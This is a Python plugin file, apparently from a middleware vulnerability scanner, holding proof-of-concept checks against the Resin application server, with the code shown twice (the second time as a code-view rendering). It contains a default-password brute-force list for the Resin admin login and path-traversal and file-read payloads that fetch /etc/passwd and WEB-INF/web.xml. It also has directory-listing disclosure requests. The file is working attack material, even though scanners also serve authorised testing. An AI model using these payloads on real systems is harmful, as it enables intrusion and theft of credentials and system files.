N-MiddlewareScan/plugins/resin_plugin.py

#coding=utf-8
pocs=[
    {"requests_option":"POST",
     "url":["/resin-admin/j_security_check?j_uri=index.php"],
     "params":[],
     "data":["j_username=%s&j_password=%s"],
     "flag":['<th>Resin home:</th>','The Resin version','Resin Summary'],
     "success":"exist /resin-admin/j_security_check?j_uri=index.php weak password",
     "fail":"NOT exist /resin-admin/j_security_check?j_uri=index.php weak password",
     "end":"/resin-admin/j_security_check?j_uri=index.php扫描完成",
     "admin_bursk":"True",
     "username":['admin'],
     "password":['admin','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root'],
     },
    {"requests_option":"GET",
     "url":["/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"],
     "params":[],
     "data":[],
     "flag":["root:"],
     "success":"exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
     "fail":"not exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
     "end":"/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
    {"requests_option":"GET",
     "url":["/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml"],
     "params":[],
     "data":[],
     "flag":["xml version"],
     "success":"",
     "fail":"",
     "end":"/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
{"requests_option":"GET",
     "url":["/%20..\\web-inf"],
     "params":[],
     "data":[],
     "flag":["<h1>Directory of"],
     "success":"",
     "fail":"",
     "end":"/%20..\\web-inf扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
{"requests_option":"GET",
     "url":["/%3f.jsp"],
     "params":[],
     "data":[],
     "flag":["<h1>Directory of"],
     "success":"",
     "fail":"",
     "end":"/%3f.jsp扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
{"requests_option":"GET",
     "url":["/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],
     "params":[],
     "data":[],
     "flag":["root:"],
     "success":"",
     "fail":"",
     "end":"/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
]
new plugin 2019-03-28 23:56:13 +08:00			`#coding=utf-8`
			`pocs=[`
			`{"requests_option":"POST",`
			`"url":["/resin-admin/j_security_check?j_uri=index.php"],`
			`"params":[],`
			`"data":["j_username=%s&j_password=%s"],`
			`"flag":['<th>Resin home:</th>','The Resin version','Resin Summary'],`
			`"success":"exist /resin-admin/j_security_check?j_uri=index.php weak password",`
			`"fail":"NOT exist /resin-admin/j_security_check?j_uri=index.php weak password",`
			`"end":"/resin-admin/j_security_check?j_uri=index.php扫描完成",`
			`"admin_bursk":"True",`
			`"username":['admin'],`
			`"password":['admin','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root'],`
			`},`
			`{"requests_option":"GET",`
			`"url":["/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"],`
			`"params":[],`
			`"data":[],`
			`"flag":["root:"],`
			`"success":"exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",`
			`"fail":"not exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",`
			`"end":"/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成",`
			`"admin_bursk":"",`
			`"username":[],`
			`"password":[],`
			`},`
			`{"requests_option":"GET",`
			`"url":["/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml"],`
			`"params":[],`
			`"data":[],`
			`"flag":["xml version"],`
			`"success":"",`
			`"fail":"",`
			`"end":"/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成",`
			`"admin_bursk":"",`
			`"username":[],`
			`"password":[],`
			`},`
			`{"requests_option":"GET",`
			`"url":["/%20..\\web-inf"],`
			`"params":[],`
			`"data":[],`
			`"flag":["<h1>Directory of"],`
			`"success":"",`
			`"fail":"",`
			`"end":"/%20..\\web-inf扫描完成",`
			`"admin_bursk":"",`
			`"username":[],`
			`"password":[],`
			`},`
			`{"requests_option":"GET",`
			`"url":["/%3f.jsp"],`
			`"params":[],`
			`"data":[],`
			`"flag":["<h1>Directory of"],`
			`"success":"",`
			`"fail":"",`
			`"end":"/%3f.jsp扫描完成",`
			`"admin_bursk":"",`
			`"username":[],`
			`"password":[],`
			`},`
			`{"requests_option":"GET",`
			`"url":["/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],`
			`"params":[],`
			`"data":[],`
			`"flag":["root:"],`
			`"success":"",`
			`"fail":"",`
			`"end":"/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成",`
			`"admin_bursk":"",`
			`"username":[],`
			`"password":[],`
			`},`
			`]`